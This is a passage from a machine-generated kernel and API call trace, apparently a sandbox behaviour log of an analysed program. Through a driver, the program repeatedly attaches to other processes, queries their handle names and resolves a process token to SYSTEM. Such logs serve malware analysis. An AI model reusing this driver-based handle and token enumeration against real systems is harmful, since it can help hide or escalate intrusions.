(Object=0xffffe000699004c0) returned 0x4801f [0264.964] ObQueryNameString (in: Object=0xffffe00069b0aa50, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.964] ObfDereferenceObject (Object=0xffffe00069b0aa50) returned 0x7ffe [0264.964] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.964] PsAcquireProcessExitSynchronization () returned 0x0 [0264.964] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.964] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b0ba60, HandleInformation=0x0) returned 0x0 [0264.964] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.964] PsReleaseProcessExitSynchronization () returned 0x2 [0264.964] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4801e [0264.964] ObQueryNameString (in: Object=0xffffe00069b0ba60, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.964] ObfDereferenceObject (Object=0xffffe00069b0ba60) returned 0x7ff5 [0264.964] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.964] PsAcquireProcessExitSynchronization () returned 0x0 [0264.964] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.965] ObReferenceObjectByHandle (in: Handle=0x658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b0e8b0, HandleInformation=0x0) returned 0x0 [0264.965] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.965] PsReleaseProcessExitSynchronization () returned 0x2 [0264.965] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4801d [0264.965] ObQueryNameString (in: Object=0xffffe00069b0e8b0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.965] ObfDereferenceObject (Object=0xffffe00069b0e8b0) returned 0x7fd5 [0264.965] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.965] PsAcquireProcessExitSynchronization () returned 0x0 [0264.965] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.965] ObReferenceObjectByHandle (in: Handle=0x788, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a3e5b00, HandleInformation=0x0) returned 0x0 [0264.965] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.965] PsReleaseProcessExitSynchronization () returned 0x2 [0264.965] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4801c [0264.965] ObQueryNameString (in: Object=0xffffc0014a3e5b00, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.965] ObfDereferenceObject (Object=0xffffc0014a3e5b00) returned 0x7fe4 [0264.965] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.965] PsAcquireProcessExitSynchronization () returned 0x0 [0264.965] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.965] ObReferenceObjectByHandle (in: Handle=0x88c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069323d20, HandleInformation=0x0) returned 0x0 [0264.965] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.965] PsReleaseProcessExitSynchronization () returned 0x2 [0264.965] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4801b [0264.965] ObQueryNameString (in: Object=0xffffe00069323d20, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.965] ObfDereferenceObject (Object=0xffffe00069323d20) returned 0x7fff [0264.965] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.965] PsAcquireProcessExitSynchronization () returned 0x0 [0264.965] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.965] ObReferenceObjectByHandle (in: Handle=0x89c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a31a410, HandleInformation=0x0) returned 0x0 [0264.965] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.965] PsReleaseProcessExitSynchronization () returned 0x2 [0264.965] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4801a [0264.965] ObQueryNameString (in: Object=0xffffe0006a31a410, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.965] ObfDereferenceObject (Object=0xffffe0006a31a410) returned 0x7fff [0264.965] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.965] PsAcquireProcessExitSynchronization () returned 0x0 [0264.965] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.965] ObReferenceObjectByHandle (in: Handle=0x8c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691634c0, HandleInformation=0x0) returned 0x0 [0264.965] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.965] PsReleaseProcessExitSynchronization () returned 0x2 [0264.965] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48019 [0264.966] ObQueryNameString (in: Object=0xffffe000691634c0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.966] ObfDereferenceObject (Object=0xffffe000691634c0) returned 0x7ff8 [0264.966] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.966] PsAcquireProcessExitSynchronization () returned 0x0 [0264.966] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.966] ObReferenceObjectByHandle (in: Handle=0x8e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4a8090, HandleInformation=0x0) returned 0x0 [0264.966] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.966] PsReleaseProcessExitSynchronization () returned 0x2 [0264.966] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48018 [0264.966] ObQueryNameString (in: Object=0xffffe0006a4a8090, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.966] ObfDereferenceObject (Object=0xffffe0006a4a8090) returned 0x7ffb [0264.966] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.966] PsAcquireProcessExitSynchronization () returned 0x0 [0264.966] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.966] ObReferenceObjectByHandle (in: Handle=0x8f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a3e5710, HandleInformation=0x0) returned 0x0 [0264.966] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.966] PsReleaseProcessExitSynchronization () returned 0x2 [0264.966] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48017 [0264.966] ObQueryNameString (in: Object=0xffffc0014a3e5710, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.966] ObfDereferenceObject (Object=0xffffc0014a3e5710) returned 0x7fed [0264.966] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.966] PsAcquireProcessExitSynchronization () returned 0x0 [0264.966] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.966] ObReferenceObjectByHandle (in: Handle=0x8f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a790cd0, HandleInformation=0x0) returned 0x0 [0264.966] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.966] PsReleaseProcessExitSynchronization () returned 0x2 [0264.966] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48016 [0264.966] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.966] ObfDereferenceObject (Object=0xffffe0006a790cd0) returned 0x7ff0 [0264.966] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.966] PsAcquireProcessExitSynchronization () returned 0x0 [0264.966] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.966] ObReferenceObjectByHandle (in: Handle=0x900, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4c19f0, HandleInformation=0x0) returned 0x0 [0264.966] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.966] PsReleaseProcessExitSynchronization () returned 0x2 [0264.966] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48015 [0264.966] ObQueryNameString (in: Object=0xffffe0006a4c19f0, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.966] ObfDereferenceObject (Object=0xffffe0006a4c19f0) returned 0x7ff8 [0264.966] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.966] PsAcquireProcessExitSynchronization () returned 0x0 [0264.966] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.966] ObReferenceObjectByHandle (in: Handle=0x904, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a8f3cd0, HandleInformation=0x0) returned 0x0 [0264.966] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.966] PsReleaseProcessExitSynchronization () returned 0x2 [0264.967] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48014 [0264.967] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.967] ObfDereferenceObject (Object=0xffffe0006a8f3cd0) returned 0x7ff0 [0264.967] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.967] PsAcquireProcessExitSynchronization () returned 0x0 [0264.967] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.967] ObReferenceObjectByHandle (in: Handle=0x928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a7d8f20, HandleInformation=0x0) returned 0x0 [0264.967] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.967] PsReleaseProcessExitSynchronization () returned 0x2 [0264.967] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48013 [0264.967] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.967] ObfDereferenceObject (Object=0xffffe0006a7d8f20) returned 0x7ff1 [0264.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x140) returned 0x180 [0264.967] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.967] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006993e080, HandleInformation=0x0) returned 0x0 [0264.967] ObOpenObjectByPointer (in: Object=0xffffe0006993e080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x48035 [0264.967] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.967] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.967] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.967] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.968] CloseHandle (hObject=0x1a8) returned 1 [0264.968] CloseHandle (hObject=0x180) returned 1 [0264.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.968] PsAcquireProcessExitSynchronization () returned 0x0 [0264.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.968] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006993f8f0, HandleInformation=0x0) returned 0x0 [0264.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.968] PsReleaseProcessExitSynchronization () returned 0x2 [0264.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40033 [0264.968] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.968] ObfDereferenceObject (Object=0xffffe0006993f8f0) returned 0x7fff [0264.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.968] PsAcquireProcessExitSynchronization () returned 0x0 [0264.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.968] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069941b10, HandleInformation=0x0) returned 0x0 [0264.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.968] PsReleaseProcessExitSynchronization () returned 0x2 [0264.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40032 [0264.968] ObQueryNameString (in: Object=0xffffe00069941b10, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.968] ObfDereferenceObject (Object=0xffffe00069941b10) returned 0x7fff [0264.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.968] PsAcquireProcessExitSynchronization () returned 0x0 [0264.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069945580, HandleInformation=0x0) returned 0x0 [0264.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.969] PsReleaseProcessExitSynchronization () returned 0x2 [0264.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40031 [0264.969] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.969] ObfDereferenceObject (Object=0xffffe00069945580) returned 0x7ffd [0264.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.969] PsAcquireProcessExitSynchronization () returned 0x0 [0264.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069963e40, HandleInformation=0x0) returned 0x0 [0264.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.969] PsReleaseProcessExitSynchronization () returned 0x2 [0264.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40030 [0264.969] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.969] ObfDereferenceObject (Object=0xffffe00069963e40) returned 0x7ffe [0264.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.969] PsAcquireProcessExitSynchronization () returned 0x0 [0264.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696e1890, HandleInformation=0x0) returned 0x0 [0264.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.969] PsReleaseProcessExitSynchronization () returned 0x2 [0264.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002f [0264.969] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.969] ObfDereferenceObject (Object=0xffffe000696e1890) returned 0x8000 [0264.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.969] PsAcquireProcessExitSynchronization () returned 0x0 [0264.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0x190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696df6d0, HandleInformation=0x0) returned 0x0 [0264.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.969] PsReleaseProcessExitSynchronization () returned 0x2 [0264.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002e [0264.969] ObQueryNameString (in: Object=0xffffe000696df6d0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.969] ObfDereferenceObject (Object=0xffffe000696df6d0) returned 0x7ffe [0264.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.969] PsAcquireProcessExitSynchronization () returned 0x0 [0264.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069964390, HandleInformation=0x0) returned 0x0 [0264.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.969] PsReleaseProcessExitSynchronization () returned 0x2 [0264.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002d [0264.969] ObQueryNameString (in: Object=0xffffe00069964390, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.969] ObfDereferenceObject (Object=0xffffe00069964390) returned 0x7ffe [0264.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.969] PsAcquireProcessExitSynchronization () returned 0x0 [0264.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.969] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069965ea0, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.970] PsReleaseProcessExitSynchronization () returned 0x2 [0264.970] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002c [0264.970] ObQueryNameString (in: Object=0xffffe00069965ea0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.970] ObfDereferenceObject (Object=0xffffe00069965ea0) returned 0x7ff3 [0264.970] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.970] PsAcquireProcessExitSynchronization () returned 0x0 [0264.970] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.970] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a7c20, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.970] PsReleaseProcessExitSynchronization () returned 0x2 [0264.970] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002b [0264.970] ObQueryNameString (in: Object=0xffffe000699a7c20, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.970] ObfDereferenceObject (Object=0xffffe000699a7c20) returned 0x7ff5 [0264.970] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.970] PsAcquireProcessExitSynchronization () returned 0x0 [0264.970] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.970] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a8f20, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.970] PsReleaseProcessExitSynchronization () returned 0x2 [0264.970] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4002a [0264.970] ObQueryNameString (in: Object=0xffffe000699a8f20, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.970] ObfDereferenceObject (Object=0xffffe000699a8f20) returned 0x7ffe [0264.970] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.970] PsAcquireProcessExitSynchronization () returned 0x0 [0264.970] KeStackAttachProcess 